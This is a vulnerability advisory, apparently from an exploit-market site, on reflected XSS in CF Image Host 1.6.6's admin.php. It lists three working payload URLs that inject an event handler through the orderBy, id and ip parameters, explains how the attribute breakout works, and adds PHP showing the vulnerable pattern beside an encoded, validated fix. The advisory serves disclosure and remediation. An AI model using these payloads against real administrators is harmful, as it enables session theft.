0day Today Exploits Market and 0day Exploits Database

CF Image Host 1.6.6 Cross Site Scripting Vulnerability

Author: hyp3rlinx
Risk: Low
0day-ID: 0day-ID-24550
Category: web applications
Date added: 16-11-2015
Platform: php

Vendor:
====================================
codefuture.co.uk/projects/imagehost


Product:
===================================
CF Image Host 1.65 - 1.6.6

The archive download is listed as version 1.65 but unzips as imagehost 1.6.6,
so both version strings refer to the same affected code.


Vulnerability Details:
=====================

Multiple reflected cross-site scripting (XSS) entry points exist in admin.php.
A victim who follows a crafted link executes attacker-supplied script in the
context of the application's origin, undermining the trust between client and
server and potentially leading to information theft, malware delivery, or
session cookie theft. All three entry points sit in admin.php, so the payload
runs in the browser of an administrator who opens the link.



XSS Exploit code(s):
===================

1)
http://localhost/imagehost1.6.6/admin.php?act=images&orderBy=%22%20onMouseMove=%22alert%280%29

2)
http://localhost/imagehost1.6.6/admin.php?act=edit&id=%22%20onMouseMove=%22alert%280%29

3)
http://localhost/imagehost1.6.6/admin.php?act=images&ip=%22%20onMouseMove=%22alert%280%29

Each payload URL-decodes to `" onMouseMove="alert(0)`. The parameter value is
reflected unencoded inside a double-quoted HTML attribute: the leading quote
closes that attribute and the remainder becomes a new event-handler attribute,
so the script fires as soon as the mouse moves over the element.


Description:
=====================================================

Request Method(s):              [+] GET
Vulnerable Product:             [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s):        [+] orderBy, id, ip
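As an added illustration, and not code from CF Image Host or from the advisory author, the PHP below shows the reflected-attribute pattern these payloads exploit next to its hardened form, plus value-space validation for the two parameters that have a small legal range. The markup, the column list and the function names are assumptions; the advisory does not show admin.php's source.

```php
<?php
declare(strict_types=1);

// Decoded form of the advisory's payload (%22%20onMouseMove=%22alert%280%29).
const PAYLOAD = '" onMouseMove="alert(0)';

// Assumed markup (not the project's real template): the "ip" filter value is
// echoed back into an <input> so the administrator sees the active filter.
function render_ip_filter_vulnerable(string $ip): string
{
    // Raw concatenation into a double-quoted attribute: a " in $ip closes the
    // attribute and whatever follows becomes new attributes on the element.
    return '<input type="text" name="ip" value="' . $ip . '">';
}

function render_ip_filter_safe(string $ip): string
{
    // Encode for the attribute context. ENT_QUOTES encodes both " and ' so the
    // value can never terminate the attribute early, whatever the quoting style.
    $safe = htmlspecialchars($ip, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="ip" value="' . $safe . '">';
}

// Defence in depth for the other two parameters: orderBy names a column and
// id is a record number, so reject anything outside that shape before use.
function validate_order_by(string $orderBy): string
{
    $allowed = ['date', 'size', 'name', 'ip']; // assumed column list
    return in_array($orderBy, $allowed, true) ? $orderBy : 'date';
}

function validate_id(string $id): ?int
{
    return ctype_digit($id) ? (int) $id : null;
}

// Render the same payload through both paths so the difference is visible.
echo "vulnerable: " . render_ip_filter_vulnerable(PAYLOAD) . "\n";
echo "hardened:   " . render_ip_filter_safe(PAYLOAD) . "\n";
echo "orderBy:    " . validate_order_by(PAYLOAD) . "\n";
echo "id:         " . var_export(validate_id(PAYLOAD), true) . "\n";
```

Run with `php example.php`. The vulnerable renderer emits an `<input>` whose `value` attribute ends at the injected quote, followed by a live `onMouseMove` handler; the hardened renderer emits the quotes as `&quot;`, so the whole payload stays inside the attribute as inert text. The two validators fall back to `date` and `null` for the payload, which is the correct outcome for a parameter that should only ever hold a column name or a numeric id.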

#  0day.today [2024-11-15]  #